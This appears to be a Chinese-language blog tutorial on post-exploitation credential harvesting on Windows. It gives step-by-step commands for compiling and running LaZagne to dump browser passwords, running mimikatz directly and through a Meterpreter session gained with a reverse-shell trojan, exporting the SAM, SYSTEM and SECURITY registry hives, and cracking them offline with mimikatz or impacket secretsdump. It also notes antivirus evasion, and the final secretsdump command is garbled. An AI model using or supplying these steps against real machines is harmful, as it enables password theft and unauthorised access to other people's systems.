使用laZagne來抓取密碼
什么是laZagne呢,它是一個Pythono編寫的一個很強大的密碼抓取工具,有名的工具比如mimikatz,但是只能限於windwos情況下進行抓取,並且對於免殺方面的工作還要我們自己來做(但是msf等后滲透工具已經集成了,相對說利用較為方便)。
相對於laZagne來說就要差一點,因為它不僅支持跨平台,又因為使用python進行編譯的,免殺的效果就相對於mimikatz來說就強一點。
下載並且進行編譯:
支持語言:Python2.x
先安裝Python的模塊
pip install pyinstaller
下載項目
git clone https://github.com/AlessandroZ/LaZagne.git
之后進入對應的文件夾(MAC/Linux/win)
進行編譯
pyinstaller --onefile -w lazagne.py
然后就運行
laZagne.exe all
就會枚舉出瀏覽器存儲的密碼(我的瀏覽近百條明文密碼都被抓取到了),至於想要抓取系統的密碼hash就需要管理員的權限(mimikatz也是一樣的),這個就不提這個了。
關於laZagne的更多的高級用法就去項目里面查看,這里不再累述。
mimikatz抓取密碼
老牌的密碼抓取神器了,msf里面是直接集成了,獲取了meterpreter的情況下直接運行.
先看看一般用法,在CMD中執行
mimikatz
然后在執行privilege::debug
用於提升權限
導出密碼hash
sekurlsa::logonpasswords
后記:一切的情況都是在管理員情況下執行的!!(並且其實一執行360就會報毒的,還有就是關於這種在線的導出hash,其實很容易的被抓到的),其實mimikatz還有很多的功能,比如制造票據等等啦,涉及到域滲透的東西了,我還沒有理解。以后進行補充。
下面就來介紹一下如何離線導出hash
在windows下破解hash值
需要工具:mimikatz
項目地址
這里面假設我們已經獲取到了一個meterpreter的shell,接下來我們先試試msf自帶的mimikatz怎么樣,再試試離線破解hash
在meterpreter中使用mimikatz也是必須要管理員的權限,這里面我是以管理員形式運行的木馬反彈的meterpreter。
首先先加載mimikatz
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded x86 Mimikatz on an x64 architecture.
[!] Loaded Mimikatz on a newer OS (Windows 10 (10.0 Build 17763).). Did you mean to 'load kiwi' instead?
Success.
meterpreter >
接着抓取密碼
meterpreter > msv 獲取的是hash值
meterpreter > ssp 獲取的是明文信息
meterpreter > wdigest 讀取內存中存放的賬號密碼明文信息
meterpreter > kerberos
運行自定義的命令
meterpreter > mimikatz_command -f a:: 輸入一個錯誤的模塊,可以列出所有模塊
meterpreter > mimikatz_command -f samdump:: 可以列出samdump的子命令
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f handle::list 列出應用進程
meterpreter > mimikatz_command -f service::list 列出服務
Ok好了接下來我們就來試試離線的抓取hash
離線抓取hash是很必要的,因為很多時候、很多環境下是不允許執行、上傳mimikatz的
要想離線抓取hash首先我們需要備份注冊表
進入shell中執行以下命令
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
這個時候當前目錄就會出現三個.hiv的文件
利用meterpreter將他們下載下來
download xxx.hiv 保存路徑
注意:導出注冊表也是需要管理員的權限的,不然導出的是空的
接下來將他們放到mimikatz同一目錄下執行
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

成功!!!
當然不僅可以在Windows上破解在Linux上也是可以的,這里面借助的是kali中的impacket
,默認的路徑位於/root/impacket/examples/secretsdump.py
命令如下:
root@John:/tmp#python /root/impacket/examples/secretsdump.py‐samsa m.hiv ‐security security.hiv ‐system sys.hiv LOCAL
不過我的kali怎么沒有呢.jpg